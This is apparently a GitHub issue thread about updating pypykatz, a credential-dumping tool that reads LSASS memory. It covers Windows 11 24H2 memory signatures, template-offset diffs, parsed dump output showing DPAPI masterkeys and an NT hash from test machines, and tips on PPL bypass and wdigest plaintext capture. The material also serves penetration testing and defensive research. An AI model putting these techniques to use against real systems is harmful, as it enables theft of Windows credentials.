pypykatz
Win11 24H2 Signature Missing
Pypykatz doesn't contain the signatures for Win11 24H2 yet. I tried to implement it but I haven't managed yet. If anybody is better at reverse engineering, this is my progress so far:
template.signature = b'\x4c\x8b\xfe\x48\x85\xf6\x0f\x84\x68'
template.first_entry_offset = 46
template.offset2 = -4
This might be completely wrong though.
I attached lsasrv.dll from Win11 24H2.
Seems like a pretty complex task for someone like me who doesn't fully understand how this tool works. At a high level I think the 24H2 build number needs to be included for these template checks. I tinkered with it some but now I am getting a kerberos exception. The signature and offset for the kerberos template should be fine so I'm guessing it's a problem with the structs. The diff below shows the changes I made to find what I think is the right signature and offset for the msv and wdigest templates.
git diff
diff --git a/pypykatz/commons/common.py b/pypykatz/commons/common.py
index 986c0ff..e726b27 100644
--- a/pypykatz/commons/common.py
+++ b/pypykatz/commons/common.py
@@ -362,6 +362,7 @@ class WindowsBuild(enum.Enum):
WIN_10_20H2 = 19042
WIN_11_2022 = 20348
WIN_11_2023 = 22621
+ WIN_11_2024 = 26100
class WindowsMinBuild(enum.Enum):
WIN_XP = 2500
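Review bot: the two additions for build 26100 use different naming schemes, `WIN_11_2024` here and `WIN_11_24H2` in the `WindowsMinBuild` hunk that follows, while the existing `WindowsBuild` members use year-style names (`WIN_11_2023`); pick one scheme for both enums so the `>=` / `<` range checks in the templates are easier to audit against each other.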
@@ -372,6 +373,7 @@ class WindowsMinBuild(enum.Enum):
WIN_BLUE = 9400
WIN_10 = 9800
WIN_11 = 22000
+ WIN_11_24H2 = 26100
def hexdump( src, length=16, sep='.', start = 0):
diff --git a/pypykatz/lsadecryptor/packages/kerberos/templates.py b/pypykatz/lsadecryptor/packages/kerberos/templates.py
index 320b8aa..4485d90 100644
--- a/pypykatz/lsadecryptor/packages/kerberos/templates.py
+++ b/pypykatz/lsadecryptor/packages/kerberos/templates.py
@@ -101,7 +101,16 @@ class KerberosTemplate(PackageTemplate):
template.hash_password_struct = KERB_HASHPASSWORD_6_1607
template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
- elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2022.value:
+ elif WindowsBuild.WIN_11_2022.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
+ template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
+ template.first_entry_offset = 6
+ template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
+ template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_11
+ template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
+ template.hash_password_struct = KERB_HASHPASSWORD_6_1607
+ template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
+
+ elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2024.value:
template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
template.first_entry_offset = 6
template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
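Review bot: the new `>= WIN_11_2024` branch repeats the same `signature`, `first_entry_offset` and `kerberos_session_struct` as the 2022 branch it was split from, so as far as the visible lines show the split changes nothing; if the 24H2 branch is meant to select different struct definitions (the thread reports a kerberos exception while believing the Kerberos signature and offset are correct), the struct assignments are what need to differ, otherwise collapse the two branches back into the original single `>=` check. The added blank `+` line between the branches is also a stray whitespace-only change.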
diff --git a/pypykatz/lsadecryptor/packages/msv/templates.py b/pypykatz/lsadecryptor/packages/msv/templates.py
index 20600df..e3cb6ba 100644
--- a/pypykatz/lsadecryptor/packages/msv/templates.py
+++ b/pypykatz/lsadecryptor/packages/msv/templates.py
@@ -137,10 +137,15 @@ class MsvTemplate(PackageTemplate):
template.first_entry_offset = 24
template.offset2 = -4
- else:
+ elif WindowsBuild.WIN_11_2023.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
template.signature = b'\x45\x89\x37\x4c\x8b\xf7\x8b\xf3\x45\x85\xc0\x0f'
template.first_entry_offset = 27
template.offset2 = -4
+
+ else:
+ template.signature = b'\x4c\x8b\xfe\x48\x85\xf6\x0f'
+ template.first_entry_offset = 52
+ template.offset2 = -4
elif sysinfo.architecture == KatzSystemArchitecture.X86:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
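Review bot: the 24H2 template sits in the bare `else:`, so it is applied to every x64 build that none of the earlier ranges match rather than only to builds at or above 26100; make it an explicit `elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2024.value:` and keep a final `else` that fails loudly, as the wdigest template does. The values here (`\x4c\x8b\xfe\x48\x85\xf6\x0f`, `first_entry_offset = 52`) also disagree with the ones posted at the top of the thread (a signature ending in `\x84\x68` and offset 46), so one of the two sets is stale and the discrepancy should be reconciled before merging.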
diff --git a/pypykatz/lsadecryptor/packages/wdigest/templates.py b/pypykatz/lsadecryptor/packages/wdigest/templates.py
index 150f5f1..f53cb3b 100644
--- a/pypykatz/lsadecryptor/packages/wdigest/templates.py
+++ b/pypykatz/lsadecryptor/packages/wdigest/templates.py
@@ -41,11 +41,17 @@ class WdigestTemplate(PackageTemplate):
template.primary_offset = 48
template.list_entry = PWdigestListEntry
- elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11.value:
+ elif WindowsMinBuild.WIN_11.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_11_24H2.value:
template.signature = b'\x48\x3b\xd8\x74'
template.first_entry_offset = -4
template.primary_offset = 48
template.list_entry = PWdigestListEntry
+
+ elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11_24H2.value:
+ template.signature = b'\x48\x3b\xd9\x0f'
+ template.first_entry_offset = -4
+ template.primary_offset = 48
+ template.list_entry = PWdigestListEntry
else:
raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
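Review bot: the new 24H2 signature `\x48\x3b\xd9\x0f` ends in the first byte of a two-byte near conditional jump (`0f xx`), whereas the old `\x48\x3b\xd8\x74` ends in a one-byte short jump (`74`), yet `first_entry_offset = -4` is carried over unchanged; confirm the offset still lands on the intended displacement for the longer instruction. The `primary_offset` and `list_entry` lines are identical in both Win11 branches and could be hoisted out of the split.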
You are right, I didn't include the build number. To test it I put my code in the else condition (no build number match, execute with my signature).
This is the guide I followed to get the signature values. https://www.praetorian.com/blog/inside-mimikatz-part2/
Thanks for the article. Still not 100% sure on calculating the offset. 23 maybe? I'm also getting a PEB parsing error. Here is my current output with the changes I made.
pypykatz lsa minidump ../lsass_win11.dmp
INFO:pypykatz:Parsing file ../lsass_win11.dmp
ERROR:root:PEB parsing error!
Traceback (most recent call last):
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 86, in _parse
self.__parse_peb()
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 235, in __parse_peb
self.peb = PEB.from_minidump(self)
^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/structures/peb.py", line 85, in from_minidump
buff_reader.move(minidumpfile.threads.threads[0].Teb + PEB_OFFSETS[offset_index]["peb"])
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 136, in move
self._select_segment(address)
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 104, in _select_segment
raise Exception('Memory address 0x%08x is not in process memory space' % requested_position)
Exception: Memory address 0x00000060 is not in process memory space
FILE: ======== ../lsass_win11.dmp =======
== Orphaned credentials ==
== WDIGEST [887d6]==
username Administrator
domainname JUICY
password None
password (hex)
== WDIGEST [14332]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [142e5]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e4]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d8a3]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d908]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e7]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== DPAPI [887d6]==
luid 559062
key_guid 9536a4de-f4ab-454a-8605-45c30ea579ea
masterkey 8e8a281bbd7d1f6063b8f2b6cc1e0fe4b427162acaad48565c757159419078e63afec2bc47b9ab536600aa7f852f23ac02fd39c8a864b58294891dacc9b7042a
sha1_masterkey f9d9a897d4501d268008cd519f8db403be976a6e
== DPAPI [3e7]==
luid 999
key_guid 896fd8e5-88d1-4328-bc25-8b7c2b58ae3b
masterkey 0fc77e1e7956dc9a54a5eeffdde3cee1574734d8150abaf58b1a82a2a90ce0e2604f27a2499a77a75f29e26fcf8586ccbe915ad74ba19063fc8285c312d35aa1
sha1_masterkey 7a1edd5c4501ef9ae7278c7654b4bcff337d859b
== DPAPI [3e7]==
luid 999
key_guid 67c2715a-9448-4e8f-a378-692bd18b7ee1
masterkey b66f15ed9b4b62c38cc9a407fce7034643b376ab60a9a4eccfb33d09094c07e02efc139517d59e4e7d9991135f0509b5721ae9308d4a9e9905567a507e930863
sha1_masterkey 55d12300aa2028b8db413f9881332e73b12210e7
== DPAPI [3e7]==
luid 999
key_guid 98c6d1f2-8891-4b1c-be2c-36a968a3b4ea
masterkey a8ed2aae4bd435a265f86a6de3bbd75df90ddcd616710b3a6039f6203c67c00e74dcfb0bd3169b0305b17ca3bab0aebf8a64e9cb350b60cb8506c4a0be72d04d
sha1_masterkey 701d9b5ef41de502fb6baac0d064ab92c2db7595
== Errors ==
kerberos_exception_please_report
As far as I understand the first offset should be the offset between the start of the signature and LogonSessionList. So basically a way for the tool to find the pointer to LogonSessionList. I determined this to be 46.
With the second offset I am not 100% sure, but I think it is the offset to LogonSessionList. I calculated -4 here.
Well, I am also not 100% sure my signature is correct.
@mgrottenthaler can you please post a dump file I can check?
Here you go. PW=infected
Created with taskmgr.exe
> systeminfo
Host Name: WIN11
OS Name: Microsoft Windows 11 Enterprise Evaluation
OS Version: 10.0.26100 N/A Build 26100
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: N/A
Registered Organization: N/A
Product ID: 00329-20000-00001-AA381
Original Install Date: 2/21/2025, 10:14:22 AM
System Boot Time: 2/21/2025, 1:41:56 PM
System Manufacturer: innotek GmbH
System Model: VirtualBox
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 116 Stepping 1 AuthenticAMD ~3294 Mhz
BIOS Version: innotek GmbH VirtualBox, 12/1/2006
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Total Physical Memory: 8,174 MB
Available Physical Memory: 4,275 MB
Virtual Memory: Max Size: 10,094 MB
Virtual Memory: Available: 6,784 MB
Virtual Memory: In Use: 3,310 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\WIN11
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB5042098
[02]: KB5048779
[03]: KB5050575
[04]: KB5043080
[05]: KB5043113
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Desktop Adapter
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.0.2.2
IP address(es)
[01]: 10.0.2.15
[02]: fe80::7ba0:6aed:4bd:909
[03]: fd00::c191:288d:beb:3d3a
[04]: fd00::e8c3:941:2eac:4943
Virtualization-based security: Status: Not enabled
App Control for Business policy: Enforced
App Control for Business user mode policy: Audit
Security Features Enabled:
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Was this your card?
== LogonSession ==
authentication_id 322002 (4e9d2)
session_id 1
username magnify
domainname WIN11
logon_server WIN11
logon_time 2025-02-21T11:42:29.403870+00:00
sid S-1-5-21-800810350-130866625-3627431900-1004
luid 322002
== MSV ==
Username: magnify
Domain: WIN11
LM: NA
NT: 382878d2f9d3591fe851c21b5e794dfd
SHA1: 564a506572937f8c8358d7db8af47f97b55f8961
DPAPI: 564a506572937f8c8358d7db8af47f97b55f8961
jokes aside, should there be some credentials in the wdigest package?
Yes this is the correct one! I don't think there should be credentials in Wdigest. But I can try later this weekend to put something there.
The more data the merrier. What happened is that MS modified the layout of WLsaEnumerateLogonSession so it's now not just a simple ptr retrieval to get to the start of the LogonSessionList.
Had this issue reported a few months ago to me by @jeffmcjunkin but had little time to finish up the code. Now with 2 whole minidumps I am 60% certain on the new way to parse this version.
@mgrottenthaler may I ask for another dump of the same machine but after restart?
Okay two more dumps. One after a restart and for the second one I set UseLogonCredential to one and did various logins (RDP, runas, smb) with different users. So I think there should be data in wdigest.
lsass_after_restart_2.zip lsass_wdigest_2.zip
Sorry for the zip files containing 7z, but I had to get creative to bypass the filesize limit. PW infected again
pushed fix, now pypykatz should support win24h2
Amazing, thank you so much! I just tried it and yes indeed it works with an lsass dump. I also tried to do a dump on my live system, but here I got an error. To be honest I have never used pypykatz live before, as I find it way more convenient to do an lsass dump and later analyze it.
But just as a heads up: this didn't work. I executed the powershell with psexec64.exe -s -i powershell.exe (as system and with debug privilege, PPL and virtualization based security turned off)
== Errors ==
msv_exception_please_report
dpapi_exception_please_report
mainly a couple questions:
- What tools do you use to find/get the information?
- Are there any documents/books explaining how to do it? I read the Mimi..PtH paper, I need a better explanation. Thanks and keep up the great work!
> Amazing, thank you so much! I just tried it and yes indeed it works with an lsass dump. I also tried to do a dump on my live system, but here I got an error. To be honest I have never used pypykatz live before, as I find it way more convenient to do an lsass dump and later analyze it.
> But just as a heads up: this didn't work. I executed the powershell with psexec64.exe -s -i powershell.exe (as system and with debug privilege, PPL and virtualization based security turned off)
> == Errors ==
> msv_exception_please_report
> dpapi_exception_please_report
I ended up seeing this as I was looking for information on updates for 24H2. When lsa minidump is called for your sample, pypykatz attempts to use the template for LSA_x64_8 which results in trying to read a memory address that is not present. pypykatz then performs a bruteforce to determine if it has a valid template and then LSA_x64_9 is used and all of the data is properly read and displayed. Conversely, running live lsa results in pypykatz only ever using LSA_x64_8 which results in a failed read and the error messages you got. I had the same thing occur, so I modified the version check to allow LSA_x64_9 to be used for version 26100, which resulted in being able to read your memory dump, one I took on a test system as well as a live lsass read.
Unless there is another reason why LSA_x64_8 could be used for 23H2 and 24H2, this could probably be updated here to allow for reading 24H2 dumps.
@skelsec The newest versions of 24H2 are still not parsed correctly, some recent update broke everything. Perhaps you can have a look at it?
Link to dump: dump (Password is infected)
@M1ndo this is strange. The change required to parse your dump file is straightforward but what I don't know yet is how to check when the updated struct needs to be applied
> mainly a couple questions:
> - What tools do you use to find/get the information?
> - Are there any documents/books explaining how to do it? I read the Mimi..PtH paper, I need a better explanation. Thanks and keep up the great work!
- Literally just my eyeballs and the -vvv switch. For major changes like this I just use windbg and check what's up.
- I am not aware of any literature disseminating this.
@powerdemon the correct logic to detect which template to use is not up to date, but can you please elaborate why would one use the live version? I literally made that version because I was interested to see if I can do that, but it was never meant for real-world usage.
Hi,
I also get the error msv_exception using Pypykatz 0.6.11.
I got the dump from a domain-joined Windows 11 24H2 26100.6584 Enterprise which had the registry key RunAsPPL set to 2 and using the new tool WSASS which is supposed to handle PPL. I made sure to edit the magic header of the dump as instructed.
The DPAPI keys are successfully extracted from the dump but no other plaintext passwords, hashes or AES keys are extracted.
Attempting to parse the dump with Mimikatz master cloned today errors with kuhl_m_sekurlsa_acquireLSA ; Logon list which seems to be an error that pops up every now and then...
Thanks for looking into this!
> @M1ndo this is strange. The change required to parse your dump file is straightforward but what I don't know yet is how to check when the updated struct needs to be applied
Were you able to parse it correctly and extract information? I have tried to manually get it parsed but I wasn't able to do so.
@jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
> @M1ndo this is strange. The change required to parse your dump file is straightforward but what I don't know yet is how to check when the updated struct needs to be applied
> Were you able to parse it correctly and extract information? I have tried to manually get it parsed but I wasn't able to do so.
yes, but still waiting with an update because the previous lsass dumps in this thread are different so trying to get the template selection right.
-EDIT- Adding the results
> @jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
Certainly. Here is the dump.
> @jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
> Certainly. Here is the dump.
Awesome! it's the same timestamp!
I've pushed an update to the main branch, which will (hopefully) work for the newer msv versions as well.
Please check it out yourselves and let me know if it works.
THIS ISSUE WILL BE CLOSED IN A FEW DAYS. because we're already mixing two separate issues, one looks like it's been fixed a while ago.
> @jsdhasfedssad can you either share the dump file itself, or at least the msv dll timestamp?
> Certainly. Here is the dump.
> Awesome! it's the same timestamp!
Strange. I see this worked for you but it does not work for me. I cloned main again just now, verified that some of the added code were indeed included in the cloned files, then attempted to parse the same dump as you got again. It still fails with the same error.
@skelsec Perfect! It's all fixed.
@jsdhasfedssad you're doing something wrong, probably you're using the old version. Make sure you do a virtualenv and then pip install . to install the newest version, because I tried your dump and it works fine.
> @skelsec Perfect! It's all fixed.
> @jsdhasfedssad you're doing something wrong, probably you're using the old version. Make sure you do a virtualenv and then pip install . to install the newest version, because I tried your dump and it works fine.
I am using Virtualenv and pip install . after having installed the dependencies. I also checked that the changes committed were indeed part of my cloned code. This is what I do. Can you tell me if the below differs from how you do this?
git clone https://github.com/skelsec/pypykatz.git pypykatz
cd pypykatz
python3 -m venv venv
source venv/bin/activate
pip3 install minidump minikerberos aiowinreg msldap winacl
pip install .